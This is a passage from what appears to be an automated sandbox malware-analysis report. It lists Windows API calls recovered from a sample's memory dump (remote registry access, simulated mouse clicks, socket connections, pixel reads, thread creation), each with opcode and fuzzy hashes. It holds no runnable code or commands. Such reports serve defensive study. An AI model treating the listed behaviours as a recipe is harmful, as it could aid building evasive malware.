                                                                                                                  • Part of subcall function 00DA3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DA2AA6,?,?), ref: 00DA3B0E
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DA2DE0
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DA2E1F
                                                                                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00DA2E66
                                                                                                                • RegCloseKey.ADVAPI32(?,?), ref: 00DA2E92
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00DA2E9F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 3440857362-0
                                                                                                                • Opcode ID: 88a4fa6652c52fce44d559486e2a41bb69d35766b8d5b3db519da8d517e78546
                                                                                                                • Instruction ID: 2d3cc48707efb333c9e7d676820b87f3d4b61778d8f3e3cf54880fe7e6db7bf4
                                                                                                                • Opcode Fuzzy Hash: 88a4fa6652c52fce44d559486e2a41bb69d35766b8d5b3db519da8d517e78546
                                                                                                                • Instruction Fuzzy Hash: B1515A71218205AFD704EF68CC81E6AB7E9FF88714F04481EF596872A1DB31E905DB72
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 649e79cd7c619e9c3137b4de178184cfee9bc033ef0708cb66f1e811efa5d075
                                                                                                                • Instruction ID: ac076d17924f5233ca1bf10281a4e43e1a65f24e58c98ca789bb5f972dbd1d8c
                                                                                                                • Opcode Fuzzy Hash: 649e79cd7c619e9c3137b4de178184cfee9bc033ef0708cb66f1e811efa5d075
                                                                                                                • Instruction Fuzzy Hash: D0411335910205AFDB24DF28CC49FA9BBA9EB0A330F185261F959E72D0C7319D40D670
                                                                                                                APIs
                                                                                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00D917D4
                                                                                                                • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00D917FD
                                                                                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00D9183C
                                                                                                                  • Part of subcall function 00D484A6: __swprintf.LIBCMT ref: 00D484E5
                                                                                                                  • Part of subcall function 00D484A6: __itow.LIBCMT ref: 00D48519
                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00D91861
                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00D91869
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 1389676194-0
                                                                                                                • Opcode ID: ec70fb7f067ff3b2d10547b771e7fd85e7c64a42b479e46b4331069692483aa1
                                                                                                                • Instruction ID: fd5948f41619a96b151572a096c4e0a11656bde36d4a87cd827162ab9c0b07c6
                                                                                                                • Opcode Fuzzy Hash: ec70fb7f067ff3b2d10547b771e7fd85e7c64a42b479e46b4331069692483aa1
                                                                                                                • Instruction Fuzzy Hash: E341F935A00206EFDB11EF64C981AADBBF5EF48350B148099E80AAB361DB31ED45DB71
                                                                                                                APIs
                                                                                                                • GetCursorPos.USER32(000000FF), ref: 00D5B749
                                                                                                                • ScreenToClient.USER32(00000000,000000FF), ref: 00D5B766
                                                                                                                • GetAsyncKeyState.USER32(00000001), ref: 00D5B78B
                                                                                                                • GetAsyncKeyState.USER32(00000002), ref: 00D5B799
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AsyncState$ClientCursorScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 4210589936-0
                                                                                                                • Opcode ID: a400d0b0096e54cf6f37c6de41e2845879c5adb561e4bf8e0dd0cb0ab9fa6613
                                                                                                                • Instruction ID: e2c2e750230e9a84964f33f912890b37846fcdd8f513382660a4377faa44ab0b
                                                                                                                • Opcode Fuzzy Hash: a400d0b0096e54cf6f37c6de41e2845879c5adb561e4bf8e0dd0cb0ab9fa6613
                                                                                                                • Instruction Fuzzy Hash: 6E414A3150421AFFDF159F64C884AEABBB4FB49331F14422AFC6A96290C730A954DFB0
                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00D7C156
                                                                                                                • PostMessageW.USER32(?,00000201,00000001), ref: 00D7C200
                                                                                                                • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00D7C208
                                                                                                                • PostMessageW.USER32(?,00000202,00000000), ref: 00D7C216
                                                                                                                • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00D7C21E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostSleep$RectWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3382505437-0
                                                                                                                • Opcode ID: a88e3d10293a3800a71dba1b5c5f155c0a9f181e6cf92279c7435bd47d676109
                                                                                                                • Instruction ID: 8ed261c36e67989fb3f12956cfbcd41cec493214fce8bfc403c885bb77e6770f
                                                                                                                • Opcode Fuzzy Hash: a88e3d10293a3800a71dba1b5c5f155c0a9f181e6cf92279c7435bd47d676109
                                                                                                                • Instruction Fuzzy Hash: C631BF7190031AEFDB04CFA8DD4CA9E3BB6EB04315F108228F824EA2D1D7B09904CBA0
                                                                                                                APIs
                                                                                                                • IsWindowVisible.USER32(?), ref: 00D7E9CD
                                                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00D7E9EA
                                                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00D7EA22
                                                                                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00D7EA48
                                                                                                                • _wcsstr.LIBCMT ref: 00D7EA52
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                • String ID:
                                                                                                                • API String ID: 3902887630-0
                                                                                                                • Opcode ID: 473d0348a7b2df5fcda0b69595a25d40bdf2f916de057302c5c188e092c1a323
                                                                                                                • Instruction ID: ec79f755f23ed9549dca3aa7a6cfd4b1d711a402834d9115aa4176aaf4073953
                                                                                                                • Opcode Fuzzy Hash: 473d0348a7b2df5fcda0b69595a25d40bdf2f916de057302c5c188e092c1a323
                                                                                                                • Instruction Fuzzy Hash: DE213132204215BBEB159B69DC49E7BBFA9EF4A750F04C07AF80DCA191FA70DD4086B0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D5AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D5AF8E
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00DADCC0
                                                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00DADCE4
                                                                                                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00DADCFC
                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 00DADD24
                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00D9407D,00000000), ref: 00DADD42
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Long$MetricsSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 2294984445-0
                                                                                                                • Opcode ID: 027e8a52c26878985bf1f5f84d46d3613d47a488986302c9f0daaac260565fc3
                                                                                                                • Instruction ID: be395a3dbf9c2ff7c9cf2395b5f620a2a3931d19b4e8d1be2fdd1823bcb12eea
                                                                                                                • Opcode Fuzzy Hash: 027e8a52c26878985bf1f5f84d46d3613d47a488986302c9f0daaac260565fc3
                                                                                                                • Instruction Fuzzy Hash: 4D219A71604312AFCF245F798C48B6A37A6BB4A365B144B34F927DAAE0D770D850CAB0
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00D7CA86
                                                                                                                  • Part of subcall function 00D47E53: _memmove.LIBCMT ref: 00D47EB9
                                                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00D7CAB8
                                                                                                                • __itow.LIBCMT ref: 00D7CAD0
                                                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00D7CAF6
                                                                                                                • __itow.LIBCMT ref: 00D7CB07
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$__itow$_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 2983881199-0
                                                                                                                • Opcode ID: bcc1d41526dd08a3dfa0bccc0737e9bb232901c063605711f066a22f2cd72aca
                                                                                                                • Instruction ID: ef8507a4b16b143cb4273f269e45696f9e208fd6f1e39d872bd737ffa5f92673
                                                                                                                • Opcode Fuzzy Hash: bcc1d41526dd08a3dfa0bccc0737e9bb232901c063605711f066a22f2cd72aca
                                                                                                                • Instruction Fuzzy Hash: C821A4726407087FDB21EAA48C47EDE7A69EF5D710F059029F909E7281E6708D0587B0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D43B1E: _wcsncpy.LIBCMT ref: 00D43B32
                                                                                                                • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00D86DBA
                                                                                                                • GetLastError.KERNEL32 ref: 00D86DC5
                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00D86DD9
                                                                                                                • _wcsrchr.LIBCMT ref: 00D86DFB
                                                                                                                  • Part of subcall function 00D86D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00D86E31
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                • String ID:
                                                                                                                • API String ID: 3633006590-0
                                                                                                                • Opcode ID: 73dd9551e1d26db23554b780f333aa53cbb65f17f92e69492b19bf64a0924965
                                                                                                                • Instruction ID: e1a3972acd755fa283ca01b0affc9316c26a31fbd62f0d04d2fb8f24b64b1bc0
                                                                                                                • Opcode Fuzzy Hash: 73dd9551e1d26db23554b780f333aa53cbb65f17f92e69492b19bf64a0924965
                                                                                                                • Instruction Fuzzy Hash: 3121AC6560131A9ADB217B74EC4AFEA73A8CF12330F284566F421C3092EF24DE848B74
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D9ACD3: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00D9ACF5
                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00D99160
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00D9916F
                                                                                                                • connect.WSOCK32(00000000,?,00000010), ref: 00D9918B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 3701255441-0
                                                                                                                • Opcode ID: 6bd616785bab4b1e4a318a5e07360997cb731465c574d446f6bdeb6aca55d915
                                                                                                                • Instruction ID: a1bd61b1d2bd24bfa444e813e3962a00e922b6c72df5fa09c810e1162b13536c
                                                                                                                • Opcode Fuzzy Hash: 6bd616785bab4b1e4a318a5e07360997cb731465c574d446f6bdeb6aca55d915
                                                                                                                • Instruction Fuzzy Hash: 102151316003129FDB00AF68CC99F6EB7AAEF49764F084519F956EB3D1DA70E8058771
                                                                                                                APIs
                                                                                                                • IsWindow.USER32(00000000), ref: 00D989CE
                                                                                                                • GetForegroundWindow.USER32 ref: 00D989E5
                                                                                                                • GetDC.USER32(00000000), ref: 00D98A21
                                                                                                                • GetPixel.GDI32(00000000,?,00000003), ref: 00D98A2D
                                                                                                                • ReleaseDC.USER32(00000000,00000003), ref: 00D98A68
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 4156661090-0
                                                                                                                • Opcode ID: be3041e38da0e25be5eba7fe2e2ccbb26ba5212e15c146f67fa0a4f7b089b93d
                                                                                                                • Instruction ID: 6ac2075ce97d05c574d0a043f8fc781b7a9f056c9c63df4184f7ea0ebff6d542
                                                                                                                • Opcode Fuzzy Hash: be3041e38da0e25be5eba7fe2e2ccbb26ba5212e15c146f67fa0a4f7b089b93d
                                                                                                                • Instruction Fuzzy Hash: DC218E75A00205AFDB00EF65CC89EAABBF5EF49715B048479E94AD7352DB70AD00CBB0
                                                                                                                APIs
                                                                                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00D5B5EB
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 00D5B5FA
                                                                                                                • BeginPath.GDI32(?), ref: 00D5B611
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 00D5B63B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                                                                • String ID:
                                                                                                                • API String ID: 3225163088-0
                                                                                                                • Opcode ID: a433fc2fc41b03045da4bfa09b7a78e3834637f1d941cf4f82845d0d88842278
                                                                                                                • Instruction ID: e0f77ea04889eee9912dc2f8caf04ee8d36aaec89530208ef8ce292bdf8e14d6
                                                                                                                • Opcode Fuzzy Hash: a433fc2fc41b03045da4bfa09b7a78e3834637f1d941cf4f82845d0d88842278
                                                                                                                • Instruction Fuzzy Hash: EA214F70800306EFDF149F16DC44BA97BE9FB10326F18816AFC55AA1A0D3729AD98B74
                                                                                                                APIs
                                                                                                                • __calloc_crt.LIBCMT ref: 00D62E81
                                                                                                                • CreateThread.KERNEL32(?,?,00D62FB7,00000000,?,?), ref: 00D62EC5
                                                                                                                • GetLastError.KERNEL32 ref: 00D62ECF
                                                                                                                • _free.LIBCMT ref: 00D62ED8
                                                                                                                • __dosmaperr.LIBCMT ref: 00D62EE3
                                                                                                                  • Part of subcall function 00D6889E: __getptd_noexit.LIBCMT ref: 00D6889E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 2664167353-0
                                                                                                                • Opcode ID: 5f4fdb5c348c5441d50896c95ca7ad204be26c4f36a153d76961ecf428a57c92
                                                                                                                • Instruction ID: 192e8ae780e9bf69f5b0fccdeb138edcf1001abd97a4d91338ac536e4ab0691a
                                                                                                                • Opcode Fuzzy Hash: 5f4fdb5c348c5441d50896c95ca7ad204be26c4f36a153d76961ecf428a57c92
                                                                                                                • Instruction Fuzzy Hash: 75116132104B06AFDB21AFA9EC41DBB7BA9EF45770B140539FA54C6192EB32D8019771
                                                                                                                APIs
                                                                                                                • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00D7B903
                                                                                                                • GetLastError.KERNEL32(?,00D7B3CB,?,?,?), ref: 00D7B90D
                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00D7B3CB,?,?,?), ref: 00D7B91C
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00D7B3CB,?,?,?), ref: 00D7B923
                                                                                                                • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00D7B93A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 842720411-0
                                                                                                                • Opcode ID: 1e43bb98b52f1e4cbf1d3050e33cfe2e9e5ab5187dfd52b4c0fff03a0897900f
                                                                                                                • Instruction ID: 42165d8e447161ba968f654393aade6cc7c0b795f6a5d48d8019f0355eed91a2
                                                                                                                • Opcode Fuzzy Hash: 1e43bb98b52f1e4cbf1d3050e33cfe2e9e5ab5187dfd52b4c0fff03a0897900f
                                                                                                                • Instruction Fuzzy Hash: C1016D7120130ABFDB114FA5DC88E6B7BAEEF8A764B14402AFA49C2250DB71DC41DA70
                                                                                                                APIs
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00D88371
                                                                                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00D8837F
                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00D88387
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00D88391
                                                                                                                • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00D883CD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                • String ID:
                                                                                                                • API String ID: 2833360925-0
